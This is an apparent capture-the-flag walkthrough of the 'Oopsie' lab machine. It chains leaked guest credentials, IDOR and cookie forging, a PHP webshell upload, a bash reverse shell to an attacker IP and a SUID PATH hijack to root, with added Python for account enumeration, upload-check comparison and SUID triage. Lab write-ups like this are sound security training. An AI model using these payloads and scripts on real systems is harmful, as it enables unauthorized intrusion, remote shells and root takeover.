⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Oopsie chains several web vulnerabilities into a full system compromise. The attack path starts with guest login credentials hidden in page source, escalates via an Insecure Direct Object Reference (IDOR) to hijack the super-admin account, abuses an unrestricted file upload to plant a PHP webshell, catches a reverse shell, and then escalates privileges via a SUID binary. This is one of the most instructive chains in the Starting Point series.

Tools: nmap · burpsuite · netcat · find  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
Skill | Why it matters
Source code analysis for hidden credentials | Developer-left comments and JS files frequently contain credentials and endpoint hints
IDOR (Insecure Direct Object Reference) | Manipulating account IDs in requests to access other users' data (OWASP A01)
Unrestricted file upload exploitation | Uploading PHP when only images are expected, bypassing weak client-side validation
SUID privilege escalation | Finding binaries that run as root regardless of who executes them
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1
80/tcp open  http    Apache httpd 2.4.29

Browse to port 80 — a car rental web application. Check the page source for any interesting comments or JS file references before running any tools.

03 — Hidden Credentials in Source

Inspecting the HTML source reveals a reference to a login page. Browsing to it and inspecting the JavaScript source file exposes guest credentials embedded in the code.

Credentials found in JS source
// guest login
var user = "guest";
var pass = "guest";
Login endpoint
http://10.129.x.x/cdn-cgi/login/

Log in with guest / guest. The application grants limited access. You can browse as a guest but cannot access the upload functionality — that requires a super-admin account.

04 — IDOR to Super-Admin Access

After logging in, notice the URL and cookies include an account ID and role value. Intercept a request in Burp and examine the cookie:

Cookie values after guest login
Cookie: user=2233; role=guest

The user value is a numeric ID and role is controlled client-side. Browse to the Account page — the URL exposes the guest user ID. The application also has an accounts listing page accessible to guests that shows other user IDs.

Browsing to /cdn-cgi/login/admin.php?content=accounts&id=1
ID: 1
Name: admin
Email: admin@megacorp.com
Access ID: 34322
Modify the cookie in Burp to impersonate the admin
Cookie: user=34322; role=admin

Refresh. You now have admin-level access including the Uploads section.

ℹ  Two access-control failures are stacked here. Walking the id= parameter on the accounts page is the IDOR proper: the server returns whatever record you ask for, without checking that it belongs to the logged-in user. The cookie is the second failure: user and role are set client-side and never validated against a server-side session, so presenting the admin's Access ID with role=admin is all it takes to become super-admin. Both fall under OWASP A01 (Broken Access Control).
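The enumeration and cookie forging above, as an added example that is not part of the original walkthrough: it walks the id= parameter with the guest cookie, parses the Access ID out of each page, and builds the cookie to replay. The target host, the endpoint path and the guest cookie are taken from the page; the HTML in SAMPLE_PAGES is constructed so the script runs offline (the real markup differs, and the guest e-mail is made up).

```python
import re
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

# Endpoint and guest cookie as shown in the walkthrough; the host is a placeholder.
TARGET = "http://10.129.x.x"
ACCOUNTS_URL = TARGET + "/cdn-cgi/login/admin.php?content=accounts&id={id}"
GUEST_COOKIE = "user=2233; role=guest"

# Constructed stand-ins for the accounts page (assumption: the live markup differs;
# only the field labels and the admin record come from the walkthrough, and the
# guest e-mail is made up).
SAMPLE_PAGES: Dict[int, str] = {
    1: "<div><p>ID: 1</p><p>Name: admin</p><p>Email: admin@megacorp.com</p>"
       "<p>Access ID: 34322</p></div>",
    2: "<div><p>ID: 2</p><p>Name: guest</p><p>Email: guest@example.com</p>"
       "<p>Access ID: 2233</p></div>",
    3: "<div><p>No such account</p></div>",
}

TAG_RE = re.compile(r"<[^>]+>")
FIELD_RES = {
    "access_id": re.compile(r"Access ID\s*:?\s*(\d+)"),
    "name": re.compile(r"\bName\s*:?\s*(\S+)"),
    "email": re.compile(r"\bEmail\s*:?\s*(\S+@\S+)"),
}


def parse_account(html: str) -> Optional[Dict[str, str]]:
    """Pull Access ID, Name and Email out of one accounts page; None if no record."""
    text = TAG_RE.sub(" ", html)
    fields: Dict[str, str] = {}
    for key, rx in FIELD_RES.items():
        m = rx.search(text)
        if not m:
            return None
        fields[key] = m.group(1)
    return fields


def enumerate_accounts(fetch: Callable[[int], str], ids: Iterable[int]) -> List[Dict[str, str]]:
    """Walk the id= parameter and keep every record the server hands back.

    fetch(i) returns the page body for id=i, so the same loop runs against the
    constructed pages offline or against the target via fetch_live."""
    found = []
    for i in ids:
        acct = parse_account(fetch(i))
        if acct is not None:
            acct["id"] = str(i)
            found.append(acct)
    return found


def fetch_live(i: int) -> str:
    """Fetch id=i from the target while logged in as guest."""
    req = urllib.request.Request(ACCOUNTS_URL.format(id=i), headers={"Cookie": GUEST_COOKIE})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def forge_cookie(access_id: str, role: str = "admin") -> str:
    """The cookie to replay: the server trusts both values without a session lookup."""
    return f"user={access_id}; role={role}"


if __name__ == "__main__":
    # Offline run over the constructed pages; pass fetch_live instead to hit the target.
    for acct in enumerate_accounts(lambda i: SAMPLE_PAGES.get(i, ""), range(1, 6)):
        print(acct, "->", forge_cookie(acct["access_id"]))
```

Against the real box, swap the lambda for fetch_live and widen the id range; the page for a missing id parses to None and is skipped, so the loop is safe to run past the last valid account.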
05 — Webshell Upload

Navigate to the Uploads section. The form accepts files — the server-side validation only checks the file extension loosely. Upload a PHP webshell.

Webshell file content (shell.php)
<?php system($_GET['cmd']); ?>
Gobuster to find the upload directory
gobuster dir -u http://10.129.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt
/uploads (Status: 301)
Test command execution
curl "http://10.129.x.x/uploads/shell.php?cmd=id"
uid=33(www-data) gid=33(www-data)
✓ RCE confirmed as www-data.
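The upload check that lets shell.php through, beside the one that would have stopped it, as an added example that is not Oopsie's code. loose_check is an assumed stand-in for a weak check (trusting the client's Content-Type and a loose extension match); strict_check is the hardened form: allowlisted final extension, magic-byte check on the content, and a server-chosen filename. The sample bytes are constructed; the webshell is the one from the page.

```python
import os
import secrets
from typing import Dict, Tuple

# Allowed image extensions and the file signatures each must start with.
IMAGE_SIGNATURES: Dict[str, Tuple[bytes, ...]] = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample uploads: the walkthrough's webshell plus minimal JPEG/PNG prefixes.
WEBSHELL = b"<?php system($_GET['cmd']); ?>\n"
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def loose_check(filename: str, content_type: str) -> bool:
    """Assumed stand-in for a weak upload check (not Oopsie's real code): it believes
    the client-supplied Content-Type and only looks for '.jpg' somewhere in the name,
    so shell.php sent with Content-Type: image/jpeg passes."""
    return content_type.startswith("image/") or ".jpg" in filename.lower()


def strict_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Hardened check: only the final extension counts, it must be allowlisted, and the
    bytes must carry that format's signature. Returns (accepted, reason)."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext or '(none)'} not allowed"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match the signature for " + ext
    if b"<?php" in data or b"<?=" in data:
        # Image/PHP polyglots become dangerous once a local file include exists elsewhere.
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-chosen random name: the client's filename never reaches the disk."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, ctype, data in [("shell.php", "image/jpeg", WEBSHELL),
                              ("shell.php.jpg", "image/jpeg", WEBSHELL),
                              ("photo.jpg", "image/jpeg", JPEG_SAMPLE)]:
        print(name, "loose:", loose_check(name, ctype), "strict:", strict_check(name, data))
```

Validation alone is not the whole fix: the uploads directory should also have script execution disabled (for mod_php, for example, `php_admin_flag engine off` in that directory's config), so that even a file that slips through cannot be executed by requesting it.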
06 — Reverse Shell
Start listener
nc -lvnp 4444
Trigger reverse shell via the webshell
curl "http://10.129.x.x/uploads/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/YOUR_IP/4444+0>%261'"
Upgrade to a stable TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell, then on your own terminal:
stty raw -echo; fg
export TERM=xterm
07 — Privilege Escalation via SUID

Look for SUID binaries — executables that run with the file owner's privileges (often root) regardless of who executes them.

Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
Interesting output
/usr/bin/bugtracker
Run the binary to understand its behaviour
bugtracker
------------------
: EV Bug Tracker :
------------------
Enter bug ID: 1
cat: /root/reports/1: No such file or directory

What you're seeing: the binary runs cat on /root/reports/<id> with the ID you typed, but it names cat without an absolute path, so the shell it spawns resolves cat through PATH. PATH is inherited from your environment, so a directory you control placed at the front of it makes the SUID binary execute your cat instead of /bin/cat. Write /bin/sh into the fake cat rather than /bin/bash: on Ubuntu /bin/sh is dash, which keeps the elevated effective UID, whereas bash resets its effective UID to the real UID when the two differ unless it is started with -p.

PATH hijack to get a root shell
cd /tmp
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
bugtracker
# id uid=0(root) gid=0(root) groups=0(root)
✓ Root shell via SUID PATH hijack. Read /root/flag.txt to complete the machine.
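The triage behind section 07 as an added example, not code from the page: it lists SUID files the way find -perm -4000 does, pulls printable strings out of each binary like strings(1), and flags the combination that made bugtracker exploitable, a shell-spawning libc import next to a command string that names a utility without an absolute path. SAMPLE_BINARY is a constructed byte blob standing in for a bugtracker-like file (the ls line is made up as a safe contrast), and the UTILS and SHELL_CALLS sets are my assumptions about what is worth flagging.

```python
import os
import re
import stat
import sys
from typing import Dict, List

# libc entry points that hand a command line to /bin/sh or resolve a program via PATH.
SHELL_CALLS = {"system", "popen", "execvp", "execlp", "execvpe"}
# Utilities a custom binary is likely to shell out to (assumed list).
UTILS = {"cat", "ls", "cp", "mv", "rm", "id", "whoami", "sh", "bash", "tar",
         "find", "grep", "ps", "echo", "chmod", "chown", "service", "date"}

# Constructed stand-in for a bugtracker-like binary: not the real file, just the kind
# of strings such a binary carries (the /bin/ls line is made up as a safe contrast).
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"system\x00printf\x00setuid\x00"
    + b"Enter bug ID: \x00"
    + b"cat /root/reports/\x00"
    + b"/bin/ls -la /root/reports\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """strings(1) equivalent: runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(data: bytes) -> Dict[str, List[str]]:
    """Sort a binary's strings into shell-spawning imports, command strings that name
    a utility by bare name (PATH hijackable) and those that use an absolute path."""
    report: Dict[str, List[str]] = {"shell_calls": [], "hijackable": [], "absolute": []}
    for s in extract_strings(data):
        parts = s.split()
        head = parts[0] if parts else ""
        if s in SHELL_CALLS:
            report["shell_calls"].append(s)
        elif head in UTILS:
            report["hijackable"].append(s)
        elif head.startswith("/") and os.path.basename(head) in UTILS:
            report["absolute"].append(s)
    return report


def find_suid(root: str = "/") -> List[str]:
    """What find / -perm -4000 -type f does, without following symlinks."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    # Triage the binaries given on the command line, or every SUID file on the box.
    for path in sys.argv[1:] or find_suid():
        try:
            with open(path, "rb") as fh:
                report = triage(fh.read())
        except OSError:
            continue
        if report["shell_calls"] and report["hijackable"]:
            print(path, report)
```

A hit from this script is a lead, not proof: confirm on the box with strings or ltrace that the flagged command is actually executed (ltrace shows the system() call with its argument), then apply the PATH hijack from section 07 against that utility name.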
08 — Key Takeaways
Oopsie is a masterclass in vulnerability chaining — each step is modest in isolation, but together they go from unauthenticated visitor to root in five moves.
Concept | Real-world relevance
Credentials in JS source | Always read page source: JS files, comments, and config endpoints regularly leak credentials
IDOR on role cookie | Never trust client-controlled role or ID values; the server must validate privilege on every request
Unrestricted file upload | Any upload that accepts PHP on a PHP-enabled server leads to a webshell and RCE
SUID + relative path | Custom SUID binaries calling system tools without absolute paths are a reliable privesc vector